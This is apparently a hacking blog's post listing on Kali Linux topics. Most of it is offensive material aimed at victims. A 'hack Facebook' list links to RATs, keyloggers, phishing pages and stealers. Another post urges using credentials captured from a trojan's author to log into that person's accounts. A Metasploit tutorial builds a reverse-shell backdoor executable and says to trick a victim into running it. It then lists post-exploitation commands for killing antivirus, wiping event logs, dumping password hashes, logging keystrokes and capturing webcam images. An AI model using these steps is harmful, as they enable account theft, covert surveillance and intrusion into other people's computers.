Showing posts with label kali linux. Show all posts
Showing posts with label kali linux. Show all posts

Thursday, 17 July 2014

SQLmap (Introduction+Usage)

Sqlmap

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections. In this post you will have Download Link of sqlmap as well as the video to help you how to use and under the video you will have a brief tutorial about the usuage of SQLMAP.. 


Monday, 12 May 2014

Methods To Hack Facebook (Only For Educational Purpose)

*****This is only for educational purpose. Do at your own risk *****



This is how we can hack Facebook ID'. Hope you enjoy and Learn a lot......
How To Hack Facebook Account 2013
1 - Android Remote Administrator Tool - A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling Android Phones, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.
Here More Information - http://www.hackforums.net/showthread.php?tid=3529624


-----------------------------------------------------------------

2- Remote Administrator Tool - A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program -- such as a game -- or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a bot-net. RATs can be difficult to detect because they usually don't show up in lists of running programs or tasks. The actions they perform can be similar to those of legitimate programs. Furthermore, an intruder will often manage the level of resource use so that a drop in performance doesn't alert the user that something's amiss.
How To Create RAT - http://blackhatcrackers.blogspot.in/2013/01/remote-administration-tools.html

 
You Tube Link - http://www.youtube.com/watch?v=3i5vEbnK5xk
Download Link -http://www.2shared.com/file/A1QNxuHf/CybergateRAT1075.html

 
Download Link 2 Official Website - http://www.cyber-software.org/site/

 
Pdf Version -www.eset.com/us/resources/manuals/ERA_Basic_Setup_Guide.pdf


-----------------------------------------------------------------

3- Key-logger - Key-loggers are programs which record each keystroke on the computer they are installed on. This provides a complete log of text entered such as passwords, emails sent and websites visited. This log can then be automatically sent over a remote connection without the person using the computer necessarily knowing about it. Because of this, key-loggers are typically associated with malicious software and they will usually be picked up and removed by virus scanners. However, there are also key-loggers which are commercially available for home or office use. In this way, key-loggers have a distinct set of purposes which make them very useful in certain situations.
How To Create Keylogger -http://blackhatcrackers.blogspot.in/2013/01/keylogger-attack.html

 
You Tube Link - http://www.youtube.com/watch?v=RusJJjai7BI
Download Keylogger - http://project-neptune.net/download/


Pdf Version -www.cs.columbia.edu/~mikepo/papers/gpukeylogger.eurosec13.pdf


-----------------------------------------------------------------

4- Phishing - In computing, phishing is a form of criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures.
How To Create Facebook Fake Login Page -http://blackhatcrackers.blogspot.in/2013/01/phishing-attack.html


You Tube Link - https://www.youtube.com/watch?v=QE-kmk3vU1U
Download fake Login Page -http://www.mediafire.com/download/jjd5nojzyjz/Facebook+fake+page%28Hackingaday%29.rar


Pdf Version - www.fireeye.com/resources/pdfs/fireeye-top-spear-phishing-words.pdf


-----------------------------------------------------------------

5- Click-Jacking - Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.
What Is Clickjacking ? How It's Work ? -http://blackhatcrackers.blogspot.in/2013/01/clickjacking.html

 
You Tube Link - https://www.youtube.com/watch?v=IqN5HyqUJ2A&feature=player_embedded
Advanced Tutorial ClickJacking - http://javascript.info/tutorial/clickjacking

 
Pdf Version - seclab.stanford.edu/websec/framebusting/framebust.pdf


-----------------------------------------------------------------

6- Tabnabbing - Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert. The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. Tabnabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead loads a fake page in one of the open tabs in your browser.
What Is TabNabbing ? How It's Work -http://blackhatcrackers.blogspot.in/2013/01/tabnabbing.html


You Tube Link - https://www.youtube.com/watch?v=Njrv03jSLLM 
TabNabbing In Backtrack 5 - https://www.youtube.com/watch?v=xFo0vvq3R3g
Pdf Version -https://lirias.kuleuven.be/bitstream/123456789/400475/1/p447.pdf


----------------------------------------------------------------

7- Session Hijacking - The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
What Is Session Hijacking ? How It's Work ? -http://blackhatcrackers.blogspot.in/2013/01/session-hijacking-attack.html

 
You Tube Link - http://www.youtube.com/watch?v=YuERGiQ0naI
Pdf Version - www.dtic.mil/dtic/tr/fulltext/u2/a422361.pdf


-----------------------------------------------------------------

8- Side Jacking Using Fire Sheep - HTTP session hijacking, better known as “sidejacking”, poses a major threat to all internet users. This is due to the common use of Wi-Fi networks, which are inherently unsecure, but also because of the wide-spread misplaced trust in the safety of internet use on phones and perceived secure connections. It has been demonstrated that wired networks are also not necessarily safe from sidejacking attempts and even your interactions in an App store can be at risk as well.
If you are logging into Facebook using the open Wi-Fi network at your local watering hole, an individual with a simple tool such as Firesheep can gain access to your account, change your password, and then potentially take advantage of other programs linked to that account. These sidejacking attacks can be done without any programming knowledge and the problem isn’t simply limited to the unencrypted Wi-Fi networks we are familiar with. Firesheep can be used to intercept information sent over any unencrypted HTTP session, whether it is wired or wireless. And what can a Sidejacker do with my connection to an App store, you may wonder? Great question! Elie Bursztein at Google cites the various ways your App browsing and buying can be compromised. It can be everything from password stealing to App swapping, when an attacker’s malware App is downloaded instead of the actual App that was paid for.The industry is slowly starting to adapt the practice of always on SSL to protect users, including in App stores. The implementation of always on SSL, or end-to-end encryption using HTTPS, is a great place to start. It is natural to visit a website and feel secure because you have logged in to your account with a unique username and password, but the problem is that if the rest of the traffic is not encrypted, a Sidejacker can gain access to the vulnerable cookie and then manipulate any personal information within the account. However, when a website is secured with HTTPS from the time of first access to the time you leave, the entire session is encrypted in a way that prevents your information from being compromised.
What Is SideJacking Using FireSheep ? - http://www.hacking-tutorial.com/hacking-tutorial/firesheep-http-session-hijacking-tools/


You Tube Link - http://www.youtube.com/watch?v=8qmTVPO2jvI


-----------------------------------------------------------------

9 - ARP Poisoning - Address Resolution Protocol (ARP) poisoning is a type of attack where the Media Access Control (MAC) address is changed by the attacker. Also, called an ARP spoofing attacks, it is effective against both wired and wireless local networks. Some of the things an attacker could perform from ARP poisoning attacks include stealing data from the compromised computers, eavesdrop using man-in-the middle methods, and prevent legitimate access to services, such as Internet service.
A MAC address is a unique identifier for network nodes, such as computers, printers, and other devices on a LAN. MAC addresses are associated to network adapter that connects devices to networks. The MAC address is critical to locating networked hardware devices because it ensures that data packets go to the correct place. ARP tables, or cache, are used to correlate network devices’ IP addresses to their MAC addresses.In for a device to be able to communicate with another device with a known IP Address but an unknown MAC address the sender sends out an ARP packet to all computers on the network. The ARP packet requests the MAC address from the intended recipient with the known IP address. When the sender receives the correct MAC address then is able to send data to the correct location and the IP address and corresponding MAC address are store in the ARP table for later use.
ARP poisoning is when an attacker is able to compromise the ARP table and changes the MAC address so that the IP address points to another machine. If the attacker makes the compromised device’s IP address point to his own MAC address then he would be able to steal the information, or simply eavesdrop and forward on communications meant for the victim. Additionally, if the attacker changed the MAC address of the device that is used to connect the network to Internet then he could effectively disable access to the web and other external networks.
What Is ARP Poisoning How It's Work -http://www.mediafire.com/download/47bybhe5gd5de50/Compromising+Facebook+Account+Via+ARP+Poisoning.pdf

 
ARP Poisoning Advanced tutorial -http://openmaniak.com/ettercap_arp.php

 
You Tube Link - https://www.youtube.com/watch?v=zC4PVbcGLmU
Pdf Version - www.harmonysecurity.com/files/HS-P004_ARPPoisoning.pdf


----------------------------------------------------------------

10- Stealers - It is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's look like keyloggers but there are many differences, Stealer's steal only passwords that stored in the web browsers they wont capture keystrokes typed by the user
What Is Stealers How It's Work - http://oren-hack.blogspot.in/2012/06/tutorial-istealer-63.html

 
Advanced tutorial - http://www.101hacker.com/2011/09/hack-email-facebook-and-myspace.html


You Tube Link - http://www.youtube.com/watch?v=mOtXvbC0AMw


----------------------------------------------------------------

11 - Java Drive By - A Java Drive-By is a Java Applet that is coded in Java and is put on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be a virus or even a simple downloader. If you'd like to get the source code or wanna know more information about a Java Drive-By, use Google.
What Is Java Drive By ? How It's Work -http://blackhatcrackers.blogspot.in/2013/03/fud-java-driveby.html


You Tube Link - http://www.youtube.com/watch?v=UmzyTWbFWak 
You Tube Link For Noobs Peoples - http://www.youtube.com/watch?v=LZdB2QAgDvY


----------------------------------------------------------------

12 - Cookie Stealing Attack - Cookies are small files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and authenticate the user .For example when a user logins in Facebook a unique string is generated and one copy of it is saved on the server and other is saved on the users browser as Cookies. Both are matched every time the user does any thing in his account. So if we steal the victims cookie and inject them in our browser we will be able to imitate the victims identity to the web server and thus we will be able to login is his account . This is called as Side jacking .The best thing about this is that we need not no the victims id or password all we need is the victims cookie.
What Is Cookie Stealing Attack ? -http://blackhatcrackers.blogspot.in/2013/01/cookie-stealing-attack.html

 
You Tube Link - http://www.youtube.com/watch?v=-H1qjiwQldw


-----------------------------------------------------------------

13 - Social Engineering - Social engineering is the use of deception and manipulation to obtain confidential information. It is a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking people into breaking normal security procedures. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. In anti virus computer security software, social engineering is generally a hacker's clever manipulation of the natural human tendency to trust. The hacker's goal is to obtain information that will gain him/her unauthorized access to a system and the information that resides on that system. Typical examples of social engineering are phishing e-mails or pharming sites.
What Is Social Engineering ? -http://blackhatcrackers.blogspot.in/2013/01/social-engineering-attack.html

 
You Tube Link - http://www.youtube.com/watch?v=4VeinrY0n7o 
Pdf Version - himis.s3.amazonaws.com/social-engineering-techniques.pdf


-----------------------------------------------------------------

14 - Botnets - Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.
What Is Botnet ? How It's Work ? -http://blackhatcrackers.blogspot.in/2013/04/how-to-setup-botnet.html

 
You Tube Link - http://www.youtube.com/watch?v=zR3OQdEsRCc 
Pdf Version -www.korelogic.com/Resources/Presentations/botnets_issa.pdf


-------------------------------------------------------------------------------------------------------------------------------

15 - Man In the Middle Attacks - A Man-in-the-Middle attack is a type of cyber attack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A Man-in-the-Middle Attack allows a malicious actor to intercept, send, and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late. Man-in-the-Middle attacks can be abbreviated in many ways including, MITM, MitM, MiM, or MIM.
How They Work ? What Was That -http://www.101hacker.com/2011/03/man-in-middle-attack-using-ettercap.html


You Tube - http://www.youtube.com/watch?v=Z19p4nDfeG8
Pdf Version -www.cs.umu.se/education/examina/Rapporter/MattiasEriksson.pdf

Thursday, 24 April 2014

How to Attack an Hacker who compromised your system ?

This topic is a little bit different in the last 96 posts I taught you how to hack and today I will teach you how to hack a Hacker.

In this post I will teach you how can you reversely hack a hacker who executed a backdoor/torjan virus in your system.



Before you go any further you should be familiar with what wireshark does and how to use it just basics can help you alot and  still if you don't know the (Hello Dear No Fear Zakir is Here :P Just Email me and I will tell you How to use and what it does). And for all those who know Hurrah !!Continue





Requirement:

             WireShark (Its Download Link is Included in one of my post)-(Already Installed in Kali Linux)




Well for a torjan virus you need a email or an ftp server to have the credential data (login info) or keystrokes or screenshots Sent so the first step is to know the ftp server address or email and one important thing is that when a hacker creates a torjan virus he need to input both email/ftp address and password now how do we get these information.





Here's How


1. Run WireShark and start capturing packets for atleast 30mins for best results

2. Now after capturing data. Filter them by FTP(ftp server) once and SMTP(email server) once if you find any ftp server username and password then you caught him you can take any action you want against him if you know basic hacking and if you dont know simply be a hacker :P (Being a hacker is the best thing for keeping hackers from your system) Just Kidding well if you find an email with its password you can simply open his email and explore more social networks with his email and password.


Okay One more thing professional hackers will never leave trace of them behind these hacking used email or ftp servers. So once you make sure that there is no traces of a real person make sure you be careful next time while downloading files and installing them.


Have a Good Day :) 


-Admin (Zakir)  

Monday, 25 November 2013

Change Hostname In Kali Linux

Hello Everyone Today I will Teach You how to change hostname in Kali linux

1. What is hostname ?

Hostname is the name of the computer user or you can say the administrator of the computer .

e.g  the text after root@  is called hostname here it is 

root@13373XP1017



By default it will be something like root or admin or kali , so to change it ...

1. Open terminal and type hostname [the name you want ] and press enter
e.g hostname ethicalhacker 

2. type [text editor] /etc/hostname and press enter
e.g leafpad /etc.hostname 

A text will apper the old hostname change the text to the hostname you entered in terminal and save it .

Doneeee

Check this video to understand better 



Thursday, 21 November 2013

Terminal Banner for Linux Users

Hello Everyone Today in this post I will teach you how to get a banner for your terminal.(Video Available at the End of the Post)



To get a banner first we need "figlet" and then we have to configure it. Its Easy ..

Steps:
              1. Open terminal and type " apt-get install figlet " (without quotation marks)
2. after you installed figlet type on terminal 
 " [texteditor] /root/.bashrc " and press enter
eg. leafpad /root/.bashrc

3. Now when the text editor will open go to the end and there will be written at the last line fi now press enter and go to a new line and type " figlet [the text you want as your banner] "

for example " figlet Welcome "

Watch the Video for better understanding :)

Video:


  

Sunday, 17 November 2013

Hide IP

Hide your Real IP Location and Browse Anonymously
---------------------------------------------------------------------
How Easily you can Hide your Real IP Location and Browse Anonymously? Let's see!

Best IP Hider is SafeIP

I. Anonymous Web Surfing:

If you know your online privacy is maintained is priceless. Internet connection records containing personal information are collected and stored of from billions of Internet users around the world every day. Even with information is collected legally, it could inadvertently fall into the wrong hands and be used for tracking your online behavior, stealing your payment information, identity, or malicious purposes.

SafeIP can be used for free to protect your Internet connection from such threats by concealing your location securing your Internet connection.

II. Unblocking Websites:

Sites like Facebook, YouTube, Gmail, Twitter, and thousands of others are blocked by many schools, universities, offices, ISPs, or even countries. Even most of Google’s services were blocked by China. SafeIP can be used to unblock any website, bypassing filters and firewalls, allowing for a free Internet. SafeIP uses anti-blocking measures to prevent the software itself from being blocked by any Internet Service Provider.

III. SafeIP is best solution for:
> Online Privacy (Hide your Real IP and Surf Anonymously)
> Internet Freedom (Unblock websites and bypass firewalls)
> Streaming Support (Access streaming movie, TV, or radio sites)
> Wireless Mode Protection: Safe surfing on WiFi networks.
> Malware Protection
> Block infected malware and phishing sites.

IV. Download and Install it:
Download

Open your SafeIP and choose your location.

Browse anonymously... and hack safe! 

Friday, 15 November 2013

Using Metasploit to Hack a Windows 7 machine + Meterpreter Commands

This tutorial is only for EDUCATIONAL purpose
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!

(After the TEXT format there is the video of this tutorial, and after video there is meterpreter commands)


Requirements:
             1.Kali Linux/Backtrack
             2.Metasploit Framework

Steps:
      1.Open Terminal and type " service postgresql start && service metasploit start " (without quotation)









2.Now we need to create a payload for the machine
command for creating a payload 

msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 x > /root/backdoor.exe '




okay here after LHOST=enter your ip (to get your ip open terminal and type ifconfig and get the ip )


3.Use your social engineering skill to run the payload in the victim machine.


4.After you are successfully complete step 3 


5.Open the terminal and type  " service postgresql start && service metasploit start "   (without quotation)


6.And type ' msfconsole '


and then type the following 


use exploit/multi/handler (press enter)

set payload windows/meterpreter/reverse_tcp (press enter)
set lhost (the ip you provided while creating the payload) (press enter)
set lport 4444 (press enter)
exploit
      



Once you successfully compromised it will be like the following



      

Video: 





                                                          Meterpreter Commands:
                      1. sysinfo -----> shows the system build x86 or x64, language version, build...etc

2. run checkvm    ------>  checks to see if the victim is running a Virtual Machine or native.


3. route   --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc


4. run get_application_list  -------> This shows you applications installed on the remotye PC


5. uictl  --------->  Control Some of the User Interface Compon­ents


6. idletime ----->  shows how long the victim has not been active on the computer.


7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.


8. getuid -------> This will show you the system identity and show you who you are running as such as system.


9. ps ------> This shows all the processes running on the victim as well as the PID's


10. run get_env -------> This willl give you a lot of info on the system


11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.


12. ? ------> Shows a list of different commands.


13. getsystem -----> attempts give you local system privelages


14. reboot ------> Reboot the remote machine


15. sc config process_name start= disabled  --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.


16. clearev -------> Wipes all event logs.


17. execute -f cmd.exe -H -c  ------>  Open a command prompt on a hidden channel.


18. interact 1  ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.


19. download  -------> This command will download the specified command.  "Example"    download c:\\boot.ini


20. upload --------> upload files to the victim machine


21. portfwd ------> forward a local port to a remote service


22. run getgui -e  ------> this will enable remote desktop on the victim.


23. run gettelnet –e  -------> To enable telnet on remote machine.


24. run getcountermeasure  ------>  checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc


25. run killav  ------->   it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.


26. run get_local_subnets  ------>  used to get the local subnet of the victim machine.


27. run hostedit  ------->  allows the attacker to add entries to the Windows host file.  As a result of Windows checking the hosts file first, we can divert traffic to a fake entry


28. run remotewinenum  -------> designed to enumerate the target system with the wmic command


30. run winenum ------->  used for system enumeration.  It will dump tokens, hashes, and issue both net and wmic commands


31. run scraper  -------->  used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”


32. migrate  --------> Migrate to Another Process such as explorer.exe so you don't loose your session.


33. cat  ------->  Read the Contents of a File to the Screen


34. background  "or ctrl + z"  -------->  Back­ground the Current Session


35. irb -------> Drop into irb Scripting Mode


36. interact  --------> Interact with a Channel


37. load ------> Load One or More Meterp­reter Extensions.


38. channel  -------> Displays Info About Active Channels


39. bgkill  --------->  Kill a Background Meterp­reter Script


40. close  -------->  Close a Channel


41. enumdesktops  -------->  List All Accessible Desktops and Window Stations


42. getdesktop  ------->  Get the Current Meterp­reter Desktop


43. lpwd  -------->  Print Local Working Directory


44. ls  -------->  list Files


45. rm  -------->  Delete the Specified File


46. search  -------->  Search for Files.


47. upload  ------>  Upload File to Target


48. keyscan_start  -------->  Start Capturing Keystrokes


49. keyscan_stop Stop Capturing Keystrokes


49. keyscan_dump  -------->   Dump the Keystroke Buffer


50. screenshot  -------->   Scre­enshot of the GUI


51. setdesktop  --------->  Change the Meterp­reters Current Desktop.


52. getprivs  --------->  Attempt to Enable All Privileges Available to the Current Process


53. kill -------->  Terminate a Process    "Example"   kill 1834


54. reboot  -------->  Reboots the Remote Computer


55. reg  --------->  Interact with the Remote Registry.


56. rev2self  --------->  Calls Revert­ToS­elf() on the Remote Machine


57. shell  --------> Drop into a system shell.


58. shutdown  -------->  Shuts Down the Remote Computer


59. steal_token  ------>  Attempt to Steal an Impersonation Token from the Process


60. webcam_list  -------->  List webcams


61. webcam_snap  ------->  Take a snapshot from the specified webcam.


62. hashdump  -------->  Dumps the content of the SAM Database.


63. timestomp  ------->  Manipulates MACE Attributes


64. execute  ------> Execute a command.


65. info  -------->  Display info about active post module.


66. quit  -------->  Terminate the meterpreter session.


67. getwd  ------->  Print Working Directory


68. mkdir  ------->  make directory.


69. pwd  -------> print working directory.


70. drop_token  ------->  Relinquishes Any Active Impersonation Token


71. rmdir  --------> remove directory.



72. del  -------> delete file "exmple"  del passwords.txt